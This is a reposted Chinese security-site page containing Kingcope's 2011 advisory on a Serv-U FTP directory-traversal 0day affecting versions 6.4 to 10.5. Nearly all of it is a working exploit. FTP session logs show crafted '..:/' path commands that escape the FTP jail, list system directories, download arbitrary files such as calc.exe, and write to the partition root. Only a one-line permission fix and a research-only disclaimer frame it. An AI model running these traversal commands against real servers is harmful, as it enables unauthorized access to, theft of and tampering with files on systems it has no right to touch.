Serv-U FTP Jail Break(越权遍历目录、下载任意文件)
<p>本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! <br /><br><div class="msgheader"><div class="right"><span style="CURSOR: pointer" class="copybut"><u>复制代码</u></span></div>代码如下:</div><div class="msgborder" id="phpcode1"> <br />[*]----------------------------------------------------[*] <br />Serv-U FTP Server Jail Break 0day <br />Discovered By Kingcope <br />Year 2011 <br />[*]----------------------------------------------------[*] <br />/* <br />sebug.net <br />通过构造..:/来遍历服务器目录,下载任意文件 <br />影响版本:6.4,7.1,7.3,8.2,10.5 <br />*/ <br />Affected: <br />220 Serv-U FTP Server v7.3 ready... <br />220 Serv-U FTP Server v7.1 ready... <br />220 Serv-U FTP Server v6.4 ready... <br />220 Serv-U FTP Server v8.2 ready... <br />220 Serv-U FTP Server v10.5 ready... <br />[*]----------------------------------------------------[*] <br />C:\Users\kingcope\Desktop>ftp 192.168.133.134 <br />Verbindung mit 192.168.133.134 wurde hergestellt. <br />220 Serv-U FTP Server v6.4 for WinSock ready... <br />Benutzer (192.168.133.134:(none)): ftp (anonymous user :>) <br />331 User name okay, please send complete E-mail address as password. <br />Kennwort: <br />230 User logged in, proceed. <br />ftp> cd "/..:/..:/..:/..:/program files" <br />250 Directory changed to /LocalUser/LocalUser/LocalUser/LocalUser/program files <br />ftp> ls -la <br />200 PORT Command successful. <br />150 Opening ASCII mode data connection for /bin/ls. <br />dr--r--r-- 1 user group 0 Nov 12 21:48 . <br />dr--r--r-- 1 user group 0 Nov 12 21:48 .. <br />drw-rw-rw- 1 user group 0 Feb 14 2011 Apache Software Foundatio <br />n <br />drw-rw-rw- 1 user group 0 Feb 5 2011 ComPlus Applications <br />drw-rw-rw- 1 user group 0 Jul 11 01:06 Common Files <br />drw-rw-rw- 1 user group 0 Jul 8 16:57 CoreFTPServer <br />drw-rw-rw- 1 user group 0 Jul 11 01:06 IIS Resources <br />d--------- 1 user group 0 Jul 8 16:12 InstallShield <br />Installation Information <br />drw-rw-rw- 1 user group 0 Jul 29 15:07 Internet Explorer <br />drw-rw-rw- 1 user group 0 Jul 8 16:12 Ipswitch <br />drw-rw-rw- 1 user group 0 Feb 12 2011 Java <br />drw-rw-rw- 1 user group 0 Jul 26 13:19 NetMeeting <br />drw-rw-rw- 1 user group 0 Jul 29 14:39 Outlook Express <br />drw-rw-rw- 1 user group 0 Jul 8 15:39 PostgreSQL <br />drw-rw-rw- 1 user group 0 Nov 12 21:48 RhinoSoft.com <br />drw-rw-rw- 1 user group 0 Feb 12 2011 Sun <br />d--------- 1 user group 0 Jul 29 15:13 Uninstall Information <br />drw-rw-rw- 1 user group 0 Feb 5 2011 VMware <br />drw-rw-rw- 1 user group 0 Jul 8 15:34 WinRAR <br />drw-rw-rw- 1 user group 0 Jul 26 13:30 Windows Media Player <br />drw-rw-rw- 1 user group 0 Feb 5 2011 Windows NT <br />d--------- 1 user group 0 Feb 5 2011 WindowsUpdate <br />226 Transfer complete. <br />FTP: 1795 Bytes empfangen in 0,00Sekunden 448,75KB/s <br />ftp> <br />[*]----------------------------------------------------[*] <br />with write perms: <br />ftp> put foo.txt ..:/..:/..:/foobar <<-- writes foo into root of partition <br />[*]----------------------------------------------------[*] <br />and as anonymous ftp: <br />ftp> get ..:/..:/..:/..:/windows/system32/calc.exe yes <br />200 PORT Command successful. <br />150 Opening ASCII mode data connection for calc.exe (115712 Bytes). <br />226 Transfer complete. <br />FTP: 115712 Bytes empfangen in 0,04Sekunden 2571,38KB/s <br />[*]----------------------------------------------------[*] <br />This works to!!! : <br />220 Serv-U FTP Server v7.3 ready... <br />Benutzer (xx.xx.xx.xx:(none)): ftp <br />331 User name okay, please send complete E-mail address as password. <br />Kennwort: <br />230 User logged in, proceed. <br />ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\*" <br />200 PORT Command successful. <br />150 Opening ASCII mode data connection for /bin/ls. <br />. <br />.. <br />AUTOEXEC.BAT <br />boot.ini <br />bootfont.bin <br />bsmain_runtime.log <br />CONFIG.SYS <br />Documents and Settings <br />FPSE_search <br />Inetpub <br />IO.SYS <br />log <br />MSDOS.SYS <br />msizap.exe <br />MSOCache <br />mysql <br />NTDETECT.COM <br />ntldr <br />Program Files <br />RavBin <br />RECYCLER <br />Replay.log <br />rising.ini <br />System Volume Information <br />TDDOWNLOAD <br />WCH.CN <br />WINDOWS <br />wmpub <br />226 Transfer complete. 317 bytes transferred. 19.35 KB/sec. <br />FTP: 317 Bytes empfangen in 0,01Sekunden 21,13KB/s <br />[*]----------------------------------------------------[*] <br />Sometimes you need to give it the path: <br />ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\program files\" <br />ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\program files\*" <br />200 PORT Command successful. <br />150 Opening ASCII mode data connection for /bin/ls. <br />. <br />.. <br />360 <br />Adobe <br />ASP.NET <br />CCProxy <br />CE Remote Tools <br />cmak <br />Common Files <br />ComPlus Applications <br />D-Tools <br />FFTPServer <br />HTML Help Workshop <br />IISServer <br />InstallShield Installation Information <br />Intel <br />Internet Explorer <br />Java <br />JavaSoft <br />K-Lite Codec Pack <br />Microsoft ActiveSync <br />Microsoft Analysis Services <br />Microsoft Device Emulator <br />Microsoft MapPoint Web Service Samples <br />Microsoft MapPoint Web Service SDK, Version 4.0 <br />Microsoft Office <br />Microsoft Office Servers <br />Microsoft Silverlight <br />Microsoft SQL Server <br />Microsoft Visual SourceSafe <br />Microsoft Visual Studio 8 <br />Microsoft.NET <br />MSBuild <br />MSXML 6.0 <br />NetMeeting <br />Outlook Express <br />PortMap1.61 <br />Reference Assemblies <br />Rising <br />SQLXML 4.0 <br />SQLyog Enterprise <br />STS2Setup_2052 <br />Symantec <br />Thunder Network <br />TSingVision <br />Uninstall Information <br />Windows Media Player <br />Windows NT <br />WindowsUpdate <br />WinRAR <br />226 Transfer complete. 835 bytes transferred. 50.96 KB/sec. <br />FTP: 835 Bytes empfangen in 0,01Sekunden 64,23KB/s <br />ftp> <br /></div><br />@Sebug.net [ 2011-12-01 ]<br />脚本提供修正方法:通过设置serv_u的权限可以防范此类问题,大家一定要注意serv_u安全设置问题。</p>
頁:
[1]